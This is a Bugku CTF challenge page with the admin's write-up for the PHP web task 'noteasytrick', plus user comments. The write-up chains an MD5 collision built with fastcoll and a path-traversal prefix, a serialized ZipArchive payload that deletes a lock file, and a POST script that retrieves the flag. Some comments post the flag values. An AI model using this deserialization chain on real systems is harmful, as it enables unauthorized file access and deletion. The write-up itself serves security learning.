列表

详情

noteasytrick

平台   WEB   已通过

题目作者: Jesen

一  血: ‌‌‌‌‌信安小蚂蚁

一血奖励: 100金币

解  决: 202

提  示:

描  述: fastcoll 内置类反序列化 noteasytrick,你能绕过吗? flag在/flag

站长题解:

# 0x01 用fastcoll构造hash一致内容不一致的文件

git clone https://github.com/brimstone/fastcoll
cd fastcoll
# readflag.txt 内容如下
./../../../../../../../../flag

docker run --rm -it -v $PWD:/work -w /work -u $UID:$GID brimstone/fastcoll --prefixfile readflag.txt -o msg1.bin msg2.bin

# 0x02 通过原声 ZipArchive 类,删除 ./sandbox/lock.lock 文件

$j1 = new Jesen();
$j1->me = new ZipArchive();
$j1->filename = "./sandbox/lock.lock";
$j1->content = ZipArchive::OVERWRITE;

var_dump(serialize($j1));

构建payload

a[]=aaaa&b[]=bbbb&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}

# 0x03 读取flag, 编写getflag.php

<?php
$postdata = http_build_query(
    array(
        'a' => file_get_contents("msg1.bin"), // hash碰撞出来的文件
        'b' => file_get_contents("msg2.bin"),
        'c' => "O:5:\"Jesen\":3:{s:8:\"filename\";s:0:\"\";s:7:\"content\";s:0:\"\";s:2:\"me\";N;}"
    )
);
$opts = array('http' =>
    array(
        'method' => 'POST',
        'header' => 'Content-type: application/x-www-form-urlencoded',
        'content' => $postdata
    )
);
$context = stream_context_create($opts);
$result = file_get_contents('http://114.67.175.224:14757/', false, $context);
echo $result;
?>

执行 php getflag.php,获得flag

去做题

南京大帅哥 👍0

flag{f889439ad0dcbdb1acc9ce9af4268a8e}

XRain 👍2

基本刷完平台的题目了!!^_^

wxy1343 👍0

flag{5edbb89396fdfd54ad5c7cf0ce671c39}

Striker123456 👍0

渗透就得用bp,用火狐会总是出一些url编码之类的问题,各位

Striker123456 👍0

妈的,用火狐不行,用bp才行 学到了fastcoll,原生类

RoyYa 👍0

为什么直接在hackbar里post a,b,c的值没用,在bp里改包就出来惹,求教

fany 👍0

https://fanygit.github.io/2022/08/26/bugku-noteasytrick%20wp/#more

lejos2k22 👍0

问一下 各位大侠! 大致原理懂了 有一个疑问 打包lock.lock以后 压缩包不会被get_file_contents()读取到吗? 自己虚机测试 反序列化总失败;无法测试打包以后lock.lock的变化情况

Snw.CTF.明 👍1

解题过程可以参考http://t.csdn.cn/zbH72只有解题过程

Cassaundra 👍0

学php去了拜拜

© 2024 ctf.bugku.com